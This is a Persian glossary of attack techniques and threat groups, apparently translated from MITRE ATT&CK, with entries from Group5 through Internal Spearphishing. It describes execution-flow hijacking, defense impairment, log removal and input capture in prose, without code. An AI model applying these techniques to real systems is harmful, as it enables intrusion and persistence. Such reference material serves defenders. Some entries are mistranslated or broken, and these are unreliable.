Group5یک گروه تهدید با پیوند مشکوک ایرانی است، اگرچه این انتساب قطعی نیست. این گروه افراد مرتبط با اپوزیسیون سوریه را از طریق نیزه‌شکن و سوراخ‌های آبیاری که معمولاً از موضوعات سوری و ایرانی استفاده می‌کنند، هدف قرار داده است. Group5از دو ابزار دسترسی از راه دور ( RAT) که معمولاً در دسترس هستند، njRAT و NanoCore، و همچنین یک Android RAT، DroidJack استفاده کرده است.

تقسیم پاسخ HTTP

HTTP Response Splitting

تقسیم پاسخ HTTP زمانی اتفاق می‌افتد که داده‌ها از طریق یک منبع غیرقابل اعتماد، اغلب درخواست HTTP ، وارد برنامه وب می‌شوند. داده‌ها در یک سرصفحه HTTP پاسخ و ارسال می‌شوند که برای کاربر وب ارسال می‌شود بدون اینکه برای کاراکترهای مخرب تأیید شود.

اضافات سخت افزاری

Hardware Additions

دشمنان ممکن است لوازم جانبی رایانه‌ها یا سخت‌افزار شبکه را به یک سیستم یا شبکه وارد کنند که می‌تواند به‌عنوان بردار برای دستیابی به دسترسی استفاده شود. در حالی که ارجاعات عمومی استفاده توسط عوامل تهدید کمیاب است، بسیاری از تیم‌های قرمز/ تست‌کنندگان نفوذ از افزودنی‌های سخت‌افزاری برای دسترسی اولیه استفاده می‌کنند. محصولات تجاری و منبع باز را می توان با قابلیت هایی مانند ضربه زدن به شبکه غیرفعال، اصلاح ترافیک شبکه، تزریق ضربه کلید، خواندن حافظه هسته از طریق DMA مورد استفاده قرار داد.

جریان اجرای ربایش

Hijack Execution Flow

دشمنان ممکن است بارهای مخرب خود را با ربودن شیوه اجرای برنامه ها توسط سیستم عامل ها اجرا کنند. جریان اجرای ربوده شده می تواند به منظور تداوم باشد، زیرا این اجرای ربوده شده ممکن است در طول زمان دوباره تکرار شود. دشمنان همچنین ممکن است از این مکانیسم‌ها برای بالا بردن امتیازات یا فرار از دفاع‌ها مانند کنترل برنامه یا سایر محدودیت‌های اجرا استفاده کنند. راه‌های زیادی وجود دارد که دشمن می‌تواند جریان اجرا را هک کند، از جمله با دستکاری نحوه مکان‌یابی سیستم عامل برنامه‌هایی که باید اجرا شوند. نحوه مکان یابی سیستم عامل کتابخانه ها برای استفاده توسط یک برنامه نیز قابل رهگیری است. مکان‌هایی که سیستم‌عامل به دنبال برنامه‌ها/منابع می‌گردد، مانند دایرکتوری‌های فایل و در مورد ویندوز رجیستری، می‌توانند حاوی بارهای مخرب باشند.

.....

Hijack Execution Flow: DLL Search Order Hijacking

دشمنان ممکن است بارهای مخرب خود را با ربودن دستور جستجوی مورد استفاده برای بارگیری DLL اجرا کنند. سیستم های ویندوز از یک روش معمول برای جستجوی DLL های مورد نیاز برای بارگذاری در یک برنامه استفاده می کنند. ربودن بارهای DLL ممکن است به منظور ایجاد پایداری و همچنین افزایش امتیازات و/یا فرار از محدودیت در اجرای فایل باشد. راه های زیادی وجود دارد که دشمن می تواند بارهای DLL را ربوده باشد. دشمنان ممکن است فایل‌های کتابخانه پیوند پویا تروجان ( DLL) را در دایرکتوری قرار دهند که قبل از مکان یک کتابخانه قانونی که توسط یک برنامه درخواست می‌شود جستجو می‌شود و باعث می‌شود ویندوز کتابخانه مخرب خود را در زمانی که برنامه قربانی فراخوانی می‌کند، بارگیری کند. دشمنان همچنین ممکن است بارگذاری اولیه DLL را انجام دهند که به آن حملات کاشت باینری نیز می گویند، با قرار دادن یک DLL مخرب با همان نام DLL مشخص شده مبهم در مکانی که ویندوز قبل از DLL قانونی جستجو می کند. اغلب این مکان دایرکتوری فعلی برنامه است. حملات پیش بارگذاری DLL از راه دور زمانی رخ می دهد که یک برنامه فهرست راهنمای فعلی خود را قبل از بارگیری یک DLL روی یک مکان راه دور مانند اشتراک وب تنظیم می کند. دشمنان همچنین ممکن است مستقیماً ترتیب جستجو را از طریق تغییر مسیر DLL تغییر دهند، که پس از فعال شدن (در رجیستری و ایجاد یک فایل تغییر مسیر) ممکن است باعث شود یک برنامه یک DLL دیگر را بارگیری کند. اگر یک برنامه آسیب پذیر به ترتیب جستجو پیکربندی شده باشد تا در سطح امتیاز بالاتر اجرا شود، DLL کنترل شده توسط دشمن که بارگذاری می شود نیز در سطح بالاتر اجرا می شود. در این مورد، بسته به برنامه می‌توان از این تکنیک برای افزایش امتیاز از کاربر به مدیر یا SYSTEM یا از مدیر به SYSTEM استفاده کرد. برنامه هایی که قربانی هک کردن مسیر می شوند ممکن است به نظر عادی عمل کنند زیرا DLL های مخرب ممکن است به گونه ای پیکربندی شوند که DLL های قانونی را که قرار بود جایگزین کنند نیز بارگیری کنند.

..............

Hijack Execution Flow: DLL Side-Loading

دشمنان ممکن است بارهای مخرب خود را با بارگذاری جانبی DLL اجرا کنند. مشابه با DLL Search Order Hijacking، بارگذاری جانبی شامل ربودن DLL است که یک برنامه بارگیری می کند. اما به جای کاشت DLL در ترتیب جستجوی یک برنامه و سپس انتظار برای فراخوانی برنامه قربانی، دشمنان ممکن است مستقیماً محموله های خود را با کاشت و سپس فراخوانی یک برنامه قانونی که بار (بار) آنها را اجرا می کند، بارگذاری کنند. Side-loading از ترتیب جستجوی DLL استفاده شده توسط لودر با قرار دادن برنامه قربانی و بار(های) مخرب در کنار یکدیگر استفاده می کند. دشمنان احتمالاً از بارگذاری جانبی به عنوان وسیله ای برای پنهان کردن اقداماتی که تحت یک فرآیند سیستم یا نرم افزار قانونی، قابل اعتماد و بالقوه بالا انجام می دهند استفاده می کنند. فایل های اجرایی خوش خیم مورد استفاده برای بارگذاری جانبی محموله ها ممکن است در هنگام تحویل و/یا اجرا علامت گذاری نشوند. محموله‌های دشمن نیز ممکن است رمزگذاری/بسته‌بندی شوند یا تا زمانی که در حافظه فرآیند مورد اعتماد بارگیری شوند، مبهم شوند.

Hijack Execution Flow: Dylib Hijacking

دشمنان ممکن است با قرار دادن یک کتابخانه پویا مخرب ( dylib) با نام مورد انتظار در مسیری که برنامه قربانی در زمان اجرا جستجو می کند، بارهای خود را اجرا کنند. لودر پویا سعی می کند dylib ها را بر اساس ترتیب ترتیبی مسیرهای جستجو پیدا کند. پیشوند مسیرهای dylibs ممکن است با @rpath باشد، که به توسعه دهندگان اجازه می دهد تا از مسیرهای نسبی برای تعیین آرایه ای از مسیرهای جستجوی مورد استفاده در زمان اجرا بر اساس مکان فایل اجرایی استفاده کنند. علاوه بر این، اگر از پیوند ضعیف استفاده شود، مانند تابع LC_LOAD_WEAK_DYLIB ، یک برنامه همچنان اجرا خواهد شد حتی اگر یک dylib مورد انتظار وجود نداشته باشد. پیوند ضعیف به توسعه دهندگان این امکان را می دهد تا با اضافه شدن API های جدید، یک برنامه را روی چندین نسخه macOS اجرا کنند. دشمنان ممکن است با وارد کردن dylib های مخرب با نام dylib گم شده در مسیر شناسایی شده، اعدام شوند. Dylib ها در فضای آدرس برنامه بارگذاری می شوند و به dylib مخرب اجازه می دهند تا سطح امتیاز و منابع برنامه را به ارث ببرند. بر اساس برنامه، این می‌تواند منجر به افزایش امتیاز و دسترسی بدون ممانعت به شبکه شود. این روش همچنین ممکن است از شناسایی محصولات امنیتی اجتناب کند زیرا اجرا تحت یک فرآیند قانونی پوشانده شده است.

جریان اجرا: ضعف مجوزهای فایل نصب کننده اجرایی

Hijack Execution Flow: Executable Installer File Permissions Weakness

دشمنان ممکن است بارهای مخرب خود را با ربودن باینری های مورد استفاده توسط یک نصب کننده اجرا کنند. این فرآیندها ممکن است به طور خودکار باینری های خاصی را به عنوان بخشی از عملکرد خود یا برای انجام اقدامات دیگر اجرا کنند. اگر مجوزهای موجود در فهرست فایل سیستم حاوی یک باینری هدف، یا مجوزهای خود باینری، به درستی تنظیم نشده باشند، آنگاه باینری هدف ممکن است با استفاده از مجوزهای سطح کاربر با باینری دیگری بازنویسی شود و توسط فرآیند اصلی اجرا شود. اگر فرآیند و رشته اصلی تحت یک سطح مجوز بالاتر اجرا شوند، باینری جایگزین شده نیز تحت مجوزهای سطح بالاتر اجرا می شود که می تواند شامل SYSTEM باشد. یکی دیگر از انواع این تکنیک را می توان با بهره گیری از ضعفی که در نصاب های اجرایی و خود استخراج شونده رایج است، انجام داد. در طول فرآیند نصب، معمولاً نصاب‌ها از یک زیرشاخه در فهرست %TEMP% برای باز کردن بسته‌بندی باینری‌ها مانند DLL، EXE یا سایر محموله‌ها استفاده می‌کنند. هنگامی که نصب‌کننده‌ها زیر شاخه‌ها و فایل‌ها را ایجاد می‌کنند، اغلب مجوزهای مناسبی را برای محدود کردن دسترسی نوشتن تنظیم نمی‌کنند، که امکان اجرای کدهای نامعتبر قرار گرفته در زیر شاخه‌ها یا بازنویسی باینری‌های مورد استفاده در فرآیند نصب را فراهم می‌کند. این رفتار مربوط به ربودن سفارش جستجوی DLL است و ممکن است از آن استفاده کند. دشمنان ممکن است از این تکنیک برای جایگزینی باینری های قانونی با موارد مخرب به عنوان ابزاری برای اجرای کد در سطح مجوزهای بالاتر استفاده کنند. برخی از نصب‌کننده‌ها ممکن است به امتیازات بالاتری نیز نیاز داشته باشند که منجر به افزایش امتیاز هنگام اجرای کد کنترل‌شده توسط دشمن شود. این رفتار مربوط به Bypass User Account Control است. چندین نمونه از این ضعف در نصب کننده های رایج موجود به فروشندگان نرم افزار گزارش شده است. اگر فرآیند اجرا در یک زمان خاص یا در طول یک رویداد خاص (به عنوان مثال، راه‌اندازی سیستم) تنظیم شده باشد، می‌توان از این تکنیک برای ماندگاری نیز استفاده کرد.

جریان اجرا: ربودن پیوند دهنده پویا

Hijack Execution Flow: Dynamic Linker Hijacking

دشمنان ممکن است بارهای مخرب خود را با ربودن متغیرهای محیطی که پیوندگر پویا برای بارگیری کتابخانه های مشترک استفاده می کند، اجرا کنند. در طول مرحله آماده سازی اجرای یک برنامه، پیوند دهنده پویا مسیرهای مطلق کتابخانه های مشترک را از متغیرها و فایل های محیطی، مانند LD_PRELOAD در لینوکس یا DYLD_INSERT_LIBRARIES در macOS، مشخص می کند. کتابخانه‌های مشخص‌شده در متغیرهای محیطی ابتدا بارگذاری می‌شوند و بر کتابخانه‌های سیستمی با نام تابع یکسان اولویت دارند. این متغیرها اغلب توسط توسعه دهندگان برای اشکال زدایی باینری ها بدون نیاز به کامپایل مجدد، رفع تعارض نمادهای نگاشت شده، و اجرای توابع سفارشی بدون تغییر کتابخانه اصلی استفاده می شوند. در لینوکس و macOS، ربودن متغیرهای پیوند دهنده پویا ممکن است به حافظه، منابع سیستم شبکه قربانی، و احتمالاً امتیازات بالاتری دسترسی داشته باشد. این روش همچنین ممکن است از شناسایی محصولات امنیتی اجتناب کند زیرا اجرا تحت یک فرآیند قانونی پوشانده شده است. دشمنان می توانند متغیرهای محیطی را از طریق خط فرمان با استفاده از دستور صادرات، تابع setenv یا تابع putenv تنظیم کنند. دشمنان همچنین می توانند از Dynamic Linker Hijacking برای صادرات متغیرها در یک پوسته استفاده کنند یا متغیرها را به صورت برنامه نویسی با استفاده از نحو سطح بالاتر مانند os.environ پایتون تنظیم کنند. در لینوکس، دشمنان ممکن است LD_PRELOAD را طوری تنظیم کنند که به کتابخانه های مخربی اشاره کند که با نام کتابخانه های قانونی درخواست شده توسط یک برنامه قربانی مطابقت دارد و باعث می شود که سیستم عامل پس از اجرای برنامه قربانی، کد مخرب دشمن را بارگیری کند. LD_PRELOAD را می توان از طریق متغیر محیطی یا فایل /etc/ld.so.preload تنظیم کرد. کتابخانه های مشخص شده توسط LD_PRELOAD به ترتیب توسطdlopen() و mmap() بارگیری و در حافظه نگاشت می شوند. در macOS این رفتار از نظر مفهومی مانند لینوکس است و فقط در نحوه پیاده‌سازی کتابخانه‌های پویا macOS (dyld) در سطح پایین‌تر متفاوت است. دشمنان می‌توانند متغیر محیطی DYLD_INSERT_LIBRARIES را طوری تنظیم کنند که به کتابخانه‌های مخرب حاوی نام کتابخانه‌های قانونی یا توابع درخواست شده توسط یک برنامه قربانی اشاره کند.

..................

Hijack Execution Flow: Path Interception by PATH Environment Variable

دشمنان ممکن است بارهای مخرب خود را با ربودن متغیرهای محیطی مورد استفاده برای بارگذاری کتابخانه ها اجرا کنند. دشمنان ممکن است برنامه‌ای را در ورودی قبلی در فهرست دایرکتوری‌های ذخیره شده در متغیر محیطی PATH قرار دهند، که ویندوز پس از جستجوی متوالی در فهرست PATH در جستجوی باینری که از یک اسکریپت یا خط فرمان فراخوانی شده است، آن را اجرا می‌کند. متغیر محیطی PATH شامل فهرستی از دایرکتوری ها است. روش‌های خاصی برای اجرای یک برنامه (یعنی استفاده از cmd.exe یا خط فرمان) تنها به متغیر محیطی PATH برای تعیین مکان‌هایی که برای یک برنامه جستجو می‌شوند، زمانی که مسیر برنامه داده نشده است، متکی هستند. اگر هر دایرکتوری در متغیر محیطی PATH قبل از دایرکتوری ویندوز، %SystemRoot%\system32 (به عنوان مثال، C:\Windows\system32 ) فهرست شده باشد، ممکن است برنامه ای در فهرست قبلی قرار داده شود که نام آن همان برنامه ویندوز است. مانند cmd، PowerShell یا Python)، که زمانی که آن دستور از یک اسکریپت یا خط فرمان اجرا می شود، اجرا می شود. به عنوان مثال، اگر مسیر C:\example path قبل از C:\Windows\system32 در متغیر محیطی PATH باشد، برنامه‌ای که net.exe نام دارد و در مسیر C:\example قرار می‌گیرد به جای سیستم ویندوز "net" فراخوانی می‌شود. هنگامی که"net" از خط فرمان اجرا می شود.

.....................

Hijack Execution Flow: Path Interception by Search Order Hijacking

دشمنان ممکن است بارهای مخرب خود را با ربودن دستور جستجوی مورد استفاده برای بارگذاری سایر برنامه ها اجرا کنند. از آنجایی که برخی از برنامه‌ها با استفاده از مسیر کامل، برنامه‌های دیگر را فراخوانی نمی‌کنند، ممکن است دشمنان فایل خود را در فهرستی که برنامه فراخوانی در آن قرار دارد، قرار دهند و باعث می‌شود که سیستم‌عامل نرم‌افزار مخرب خود را به درخواست برنامه فراخوان راه‌اندازی کند. ربودن دستور جستجو زمانی اتفاق می‌افتد که یک دشمن از ترتیب جستجوی برنامه‌هایی که مسیری برای آن‌ها در نظر گرفته نشده توسط ویندوز استفاده می‌کند. برخلاف DLL Search Order Hijacking، ترتیب جستجو بسته به روشی که برای اجرای برنامه استفاده می شود متفاوت است. با این حال، معمول است که ویندوز قبل از جستجو در دایرکتوری سیستم ویندوز، در دایرکتوری برنامه شروع کننده جستجو کند. حریفی که برنامه‌ای را در برابر ربودن دستور جستجو آسیب‌پذیر می‌بیند (یعنی برنامه‌ای که مسیر یک فایل اجرایی را مشخص نمی‌کند) ممکن است از این آسیب‌پذیری با ایجاد برنامه‌ای به نام برنامه نامناسب و قرار دادن آن در فهرست برنامه شروع‌کننده استفاده کند.

Hijack Execution Flow: Path Interception by Unquoted Path

دشمنان ممکن است بارهای مخرب خود را با ربودن مراجع مسیر فایل آسیب پذیر اجرا کنند. دشمنان می توانند با قرار دادن یک فایل اجرایی در یک فهرست سطح بالاتر در مسیر، از مسیرهایی که فاقد نقل قول های اطراف هستند استفاده کنند، به طوری که ویندوز فایل اجرایی دشمن را برای راه اندازی انتخاب کند. مسیرهای سرویس و مسیرهای میانبر نیز ممکن است در برابر رهگیری مسیر آسیب‌پذیر باشند اگر مسیر دارای یک یا چند فاصله باشد و اطراف آن با علامت نقل قول احاطه نشده باشد مثلاً C:\unsafe path with or space\program.exe vs. "C:\safe path with space\program.exe"

جریان اجر: ضعف مجوزهای فایل خدمات

Hijack Execution Flow: Services File Permissions Weakness

دشمنان ممکن است بارهای مخرب خود را با ربودن باینری های استفاده شده توسط سرویس ها اجرا کنند. دشمنان ممکن است از نقص‌هایی در مجوزهای سرویس‌های ویندوز برای جایگزینی باینری استفاده کنند که هنگام شروع سرویس اجرا می‌شود. این فرآیندهای سرویس ممکن است به طور خودکار باینری های خاصی را به عنوان بخشی از عملکرد خود یا برای انجام اقدامات دیگر اجرا کنند. اگر مجوزهای دایرکتوری سیستم فایل حاوی یک باینری هدف، یا مجوزهای خود باینری به درستی تنظیم نشده باشند، ممکن است باینری هدف با استفاده از مجوزهای سطح کاربر با باینری دیگری بازنویسی شود و توسط فرآیند اصلی اجرا شود. اگر فرآیند و رشته اصلی تحت یک سطح مجوز بالاتر اجرا شوند، باینری جایگزین شده نیز تحت مجوزهای سطح بالاتر اجرا می شود که می تواند شامل SYSTEM باشد. دشمنان ممکن است از این تکنیک برای جایگزینی باینری های قانونی با موارد مخرب به عنوان ابزاری برای اجرای کد در سطح مجوزهای بالاتر استفاده کنند. اگر فرآیند اجرا در یک زمان خاص یا در طول یک رویداد خاص (مثلاً راه‌اندازی سیستم) تنظیم شده باشد، می‌توان از این تکنیک برای ماندگاری نیز استفاده کرد.

جریان اجرای ربایش: ضعف مجوزهای رجیستری خدمات

Hijack Execution Flow: Services Registry Permissions Weakness

دشمنان ممکن است بارهای مخرب خود را با ربودن ورودی های رجیستری مورد استفاده توسط سرویس ها اجرا کنند. دشمنان ممکن است از نقایصی در مجوزهای کلیدهای رجیستری مربوط به سرویس‌ها استفاده کنند تا از فایل اجرایی مشخص‌شده اولیه به فایلی که کنترل می‌کنند هدایت شوند تا کد خود را هنگام شروع سرویس راه‌اندازی کنند. ویندوز اطلاعات پیکربندی سرویس محلی را در رجیستری تحت HKLM\SYSTEM\CurrentControlSet\Services ذخیره می کند. اطلاعات ذخیره شده در زیر کلیدهای رجیستری سرویس را می توان برای تغییر پارامترهای اجرای سرویس از طریق ابزارهایی مانند کنترلر سرویس، sc.exe، PowerShell یا Reg دستکاری کرد. دسترسی به کلیدهای رجیستری از طریق لیست های کنترل دسترسی و مجوزهای کاربر کنترل می شود. اگر مجوزهای کاربران و گروه ها به درستی تنظیم نشده باشد و اجازه دسترسی به کلیدهای رجیستری برای یک سرویس را بدهد، دشمنان ممکن است binPath/ImagePath سرویس را تغییر دهند تا به یک فایل اجرایی دیگر تحت کنترل خود اشاره کنند. هنگامی که سرویس شروع می شود یا مجدداً راه اندازی می شود، برنامه کنترل شده توسط دشمن اجرا می شود و به دشمن اجازه می دهد تداوم و/یا افزایش امتیاز را در زمینه حسابی که سرویس قرار است تحت آن اجرا کند (حساب محلی/دامنه، SYSTEM، LocalService یا خدمات شبکه). دشمنان همچنین ممکن است سایر کلیدهای رجیستری را در درخت رجیستری سرویس تغییر دهند. برای مثال، کلید FailureCommand ممکن است طوری تغییر کند که هر زمان که سرویس از کار بیفتد یا عمداً خراب شود، سرویس در یک زمینه بالا اجرا شود. کلید عملکرد شامل نام DLL عملکرد یک سرویس راننده و نام چندین توابع صادر شده در DLL است. اگر کلید عملکرد از قبل وجود نداشته باشد و اگر کاربر تحت کنترل دشمن مجوز Create Subkey را داشته باشد، دشمنان ممکن است کلید عملکرد را در درخت رجیستری سرویس ایجاد کنند تا به یک DLL مخرب اشاره کند. دشمنان همچنین ممکن است کلید Parameters را اضافه کنند، که داده‌های خاص درایور یا کلیدهای فرعی سفارشی دیگر را برای سرویس‌های مخرب خود ذخیره می‌کند تا تداوم داشته باشند یا سایر فعالیت‌های مخرب را فعال کنند. علاوه بر این، اگر دشمنان سرویس‌های مخرب خود را با استفاده از svchost.exe راه‌اندازی کنند، ممکن است فایل سرویس با استفاده از HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\servicename\Parameters\ServiceDll شناسایی شود.

جریان اجرا: COR_PROFILER

Hijack Execution Flow: COR_PROFILER

دشمنان ممکن است از متغیر محیطی COR_PROFILER برای ربودن جریان اجرای برنامه‌هایی که .NET CLR. را بارگیری می‌کنند، استفاده کنند. COR_PROFILER یک ویژگی چارچوب دات نت است که به توسعه دهندگان اجازه می دهد تا یک DLL پروفایل مدیریت نشده (یا خارجی از دات نت) را برای بارگذاری در هر فرآیند دات نت که زمان اجرای زبان مشترک (CLR) را بارگیری می کند، مشخص کنند. این پروفایل‌کننده‌ها برای نظارت، عیب‌یابی و اشکال‌زدایی کدهای مدیریت‌شده اجرا شده توسط NET CLR طراحی شده‌اند. متغیر محیطی COR_PROFILER را می توان در دامنه های مختلف (سیستم، کاربر یا فرآیند) تنظیم کرد که منجر به سطوح مختلف نفوذ می شود. دامنه متغیر سیستم و محیط کاربر در رجیستری مشخص شده است، جایی که یک شیء مدل شیء جزء (COM)می‌تواند به عنوان یک DLL پروفایل ثبت شود. یک محدوده فرآیند COR_PROFILER نیز می تواند در حافظه بدون تغییر رجیستری ایجاد شود.

مخفی کردن مصنوعات

Hide Artifacts

دشمنان ممکن است سعی کنند مصنوعات مرتبط با رفتارهای خود را پنهان کنند تا از شناسایی دوری کنند. سیستم‌های عامل ممکن است دارای ویژگی‌هایی برای پنهان کردن مصنوعات مختلف مانند فایل‌های مهم سیستم و اجرای وظایف مدیریتی باشند تا از ایجاد اختلال در محیط‌های کاری کاربر جلوگیری کنند و از تغییر فایل‌ها یا ویژگی‌های روی سیستم توسط کاربران جلوگیری کنند. دشمنان ممکن است از این ویژگی‌ها برای پنهان کردن مصنوعاتی مانند فایل‌ها، فهرست‌ها، حساب‌های کاربری یا سایر فعالیت‌های سیستم برای فرار از شناسایی سوء استفاده کنند.دشمنان همچنین ممکن است سعی کنند مصنوعات مرتبط با رفتار مخرب را با ایجاد مناطق محاسباتی که از ابزارهای امنیتی رایج جدا شده اند، مانند استفاده از فناوری مجازی سازی، پنهان کنند.

یک گروه جاسوسی سایبری تحت حمایت دولت

HAFNIUM

HAFNIUM احتمالاً یک گروه جاسوسی سایبری تحت حمایت دولت است که در خارج از چین فعالیت می‌کند و حداقل از ژانویه 2021 فعال بوده است. پیمانکاران دفاعی، اتاق‌های فکر سیاست، و سازمان‌های غیردولتی.

یک گروه تهدید است

Higaisa

هیگایسا یک گروه تهدید است که گمان می رود منشاء کره جنوبی داشته باشد. هیگایسا سازمان های دولتی، عمومی و تجاری در کره شمالی را هدف قرار داده است. با این حال، آنها همچنین حملاتی را در چین، ژاپن، روسیه، لهستان و سایر کشورها انجام داده اند. Higaisa اولین بار در اوایل سال 2019 فاش شد، اما ارزیابی می شود که در اوایل سال 2009 فعالیت کرده است.

یک کمپین که توسط یک بازیگر ناشناس رهبری می شود

Honeybee

Honeybee کمپینی است که توسط یک بازیگر ناشناس رهبری می شود که سازمان های کمک های بشردوستانه را هدف قرار می دهد و در ویتنام، سنگاپور، آرژانتین، ژاپن، اندونزی و کانادا فعال بوده است. از آگوست 2017 و اخیراً در فوریه 2018 فعالیت فعال داشته است.

دسترسی اولیه

Initial Access

دسترسی اولیه شامل تکنیک‌هایی است که از بردارهای ورودی مختلف برای به دست آوردن جایگاه اولیه خود در یک شبکه استفاده می‌کنند. تکنیک‌های مورد استفاده برای به دست آوردن جایگاهی شامل spearphishing هدفمند و بهره برداری از نقاط ضعف در وب سرورهای عمومی است.

ارتباطات بین فرآیندی

Inter-Process Communication

دشمنان ممکن است از مکانیسم های ارتباط بین فرآیندی (IPC) برای اجرای کد محلی یا دستورات سوء استفاده کنند. IPCمعمولاً توسط فرآیندها برای به اشتراک گذاری داده‌ها، برقراری ارتباط با یکدیگر یا همگام سازی اجرا استفاده می شود. IPC همچنین معمولاً برای جلوگیری از موقعیت‌هایی مانند بن‌بست استفاده می‌شود، که زمانی رخ می‌دهد که فرآیندها در یک الگوی انتظار چرخه‌ای گیر کرده باشند. ممکن است دشمنان از IPC برای اجرای کد یا دستورات دلخواه سوء استفاده کنند. مکانیسم های IPC ممکن است بسته به سیستم عامل متفاوت باشد، اما معمولاً به شکلی وجود دارد که از طریق زبان های برنامه نویسی/کتابخانه ها یا رابط های بومی مانند Windows Dynamic Data Exchange یا Component Object Model قابل دسترسی است. رسانه‌های اجرایی سطح بالاتر، مانند مترجم‌های Command و Scripting نیز ممکن است از مکانیسم‌های IPC استفاده کنند. دشمنان همچنین ممکن است از خدمات راه دور مانند مدل شیء جزء توزیع شده برای تسهیل اجرای IPCاز راه دور استفاده کنند.

تصویر داخلی ایمپلنت

Implant Internal Image

دشمنان ممکن است تصاویر ابری یا کانتینری را با کد مخرب کاشت کنند تا پس از دسترسی به یک محیط، پایداری را ثابت کنند. خدمات وب آمازون ( AWS) ، تصاویر ماشین آمازون ( AWS)، تصاویر پلتفرم ابری گوگل ( GCP) و تصاویر آژور و همچنین زمان‌های اجرای کانتینر محبوب مانند Docker را می‌توان کاشت یا در پشتی قرار داد. برخلاف آپلود بدافزار، این تکنیک بر روی دشمنان تمرکز دارد که یک تصویر را در یک رجیستری در محیط قربانی قرار می دهند. بسته به نحوه تهیه زیرساخت، اگر به ابزار تأمین زیرساخت دستور داده شود همیشه از آخرین تصویر استفاده کند، این می‌تواند دسترسی دائمی را فراهم کند. ابزاری برای تسهیل کاشت درهای پشتی در تصاویر ظروف ابری ایجاد شده است. اگر یک مهاجم به یک نمونه AWS در معرض خطر دسترسی داشته باشد، و مجوز فهرست کردن تصاویر کانتینر موجود را داشته باشد، ممکن است یک درب پشتی مانند Web Shell را کاشت کند.

اشراف اطلاعاتی

Information dominance

حاکمیت اطلاعات، فناوری‌ها، خط‌مشی‌ها، فرآیندها، کنترل‌ها و استراتژی‌های سازمان است که برای بهینه‌سازی اطلاعات به‌منظور برآورده کردن نیازهای تجاری آن و همچنین مقررات قانونی و صنعتی و در عین حال به حداقل رساندن خطرات به کار می‌رود.

جنگ اطلاعاتی

Information Warfare

جنگ اطلاعاتی هر اقدامی برای رد کردن، بهره برداری، فاسد یا از بین بردن اطلاعات دشمن و کارکردهای آن، محافظت از خود در برابر این اقدامات و بهره برداری از عملکرد اطلاعات نظامی خودمان است.

امنیت اطلاعات

Information security

امنیت اطلاعات به فرآیندها و روش‌هایی اطلاق می‌شود که برای محافظت از اطلاعات یا داده‌های چاپی، الکترونیکی یا هر شکل دیگری از اطلاعات یا داده‌های محرمانه، خصوصی و حساس از دسترسی، استفاده، سوء استفاده، افشا، تخریب، اصلاح یا اختلال غیرمجاز طراحی و اجرا می‌شوند.

آسیب رساندن به دفاع ها

Impair Defenses

دشمنان ممکن است به طور مخرب اجزای یک محیط قربانی را به منظور ممانعت یا غیرفعال کردن مکانیسم های دفاعی تغییر دهند. این نه تنها شامل آسیب رساندن به دفاع های پیشگیرانه مانند فایروال ها و آنتی ویروس ها می شود، بلکه قابلیت های تشخیصی را نیز شامل می شود که مدافعان می توانند از آنها برای بررسی فعالیت ها و شناسایی رفتارهای مخرب استفاده کنند. این همچنین ممکن است هم دفاع بومی و هم قابلیت های تکمیلی نصب شده توسط کاربران و مدیران را دربرگیرد. دشمنان همچنین می توانند مکانیسم های تجمع و تجزیه و تحلیل رویدادها را هدف قرار دهند یا در غیر این صورت با تغییر سایر اجزای سیستم، این رویه ها را مختل کنند.

حذف نشانگر در هاست

Indicator Removal on Host

دشمنان ممکن است مصنوعات تولید شده در سیستم میزبان را حذف یا تغییر دهند، از جمله گزارش‌ها یا فایل‌های ضبط شده مانند بدافزار قرنطینه شده. مکان‌ها و قالب گزارش‌ها مربوط به پلتفرم یا محصول خاص است، با این حال گزارش‌های استاندارد سیستم عامل به‌عنوان رویدادهای Windows یا فایل‌های Linux/macOS مانند Bash History و /var/log/* ثبت می‌شوند. این اقدامات ممکن است با جمع‌آوری رویداد، گزارش‌دهی یا سایر اعلان‌های مورد استفاده برای شناسایی فعالیت‌های نفوذ تداخل داشته باشد. این ممکن است یکپارچگی راه حل های امنیتی را با گزارش نشدن رویدادهای مهم به خطر بیاندازد. این فعالیت همچنین ممکن است به دلیل عدم وجود داده های کافی برای تعیین آنچه رخ داده است، تجزیه و تحلیل پزشکی قانونی و واکنش حادثه را مختل کند.

اجرای غیر مستقیم فرمان

Indirect Command Execution

دشمنان ممکن است از ابزارهایی سوء استفاده کنند که امکان اجرای دستور را فراهم می کنند تا محدودیت های امنیتی را که استفاده از مفسرهای خط فرمان را محدود می کند، دور بزنند. ممکن است از ابزارهای مختلف ویندوز برای اجرای دستورات، احتمالاً بدون فراخوانی cmd استفاده شود. به عنوان مثال، Forfiles، دستیار سازگاری برنامه ( pcalua.exe) ، اجزای زیرسیستم ویندوز برای لینوکس ( WSL)، و همچنین سایر ابزارهای کمکی ممکن است اجرای برنامه ها و دستورات را از یک مترجم Command و Scripting، پنجره Run یا اجرا کنند. از طریق اسکریپت ها دشمنان ممکن است از این ویژگی‌ها برای فرار از دفاع سوء استفاده کنند، به‌ویژه برای اجرای خودسرانه در حین براندازی تشخیص‌ها و/یا کنترل‌های کاهش‌دهنده (مانند خط‌مشی گروه) که استفاده از cmd یا پسوندهای فایل را که معمولاً با بارهای مخرب مرتبط هستند، محدود یا جلوگیری می‌کنند.

ضبط ورودی

input Capture

دشمنان ممکن است از روش هایی برای گرفتن اطلاعات ورودی کاربر برای به دست آوردن اعتبار یا جمع آوری اطلاعات استفاده کنند. در طول استفاده عادی از سیستم، کاربران اغلب اعتبارنامه‌ها را به مکان‌های مختلف، مانند صفحات ورود/پورتال یا جعبه‌های محاوره‌ای سیستم ارائه می‌کنند. مکانیسم‌های دریافت ورودی ممکن است برای کاربر شفاف باشد مانند (Credential API Hooking) یا به فریب کاربر برای ارائه ورودی به خدماتی که معتقدند یک سرویس واقعی است (مثلاً ضبط پورتال وب) متکی باشد.

Spearphishing داخلی

Internal Spearphishing

